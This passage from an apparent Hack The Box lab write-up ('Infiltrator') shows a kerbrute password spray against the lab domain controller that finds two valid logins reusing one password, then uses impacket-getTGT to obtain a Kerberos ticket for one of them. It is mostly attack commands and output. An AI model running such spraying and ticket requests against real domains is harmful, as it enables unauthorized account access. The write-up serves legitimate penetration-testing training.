Password Spray
A valid domain credential has been identified. Performing a password spray attack.
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ kerbrute passwordspray --dc dc01.infiltrator.htb -d INFILTRATOR.HTB users.txt 'WAT?watismypass!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/01/24 - Ronnie Flathers @ropnop
2024/09/01 13:18:42 > Using KDC(s):
2024/09/01 13:18:42 > dc01.infiltrator.htb:88
2024/09/01 13:18:42 > [+] VALID LOGIN: l.clark@INFILTRATOR.HTB:WAT?watismypass!
2024/09/01 13:18:42 > [+] VALID LOGIN: d.anderson@INFILTRATOR.HTB:WAT?watismypass!
2024/09/01 13:18:42 > Done! Tested 12 logins (2 successes) in 0.115 secondsPassword reuse confirmed for the d.anderson user.
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/infiltrator]
└─$ impacket-getTGT INFILTRATOR.HTB/d.anderson@dc01.infiltrator.htb -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password: WAT?watismypass!
[*] Saving ticket in d.anderson@dc01.infiltrator.htb.ccacheSuccessfully validated against the target KDC
TGT generated for the d.anderson user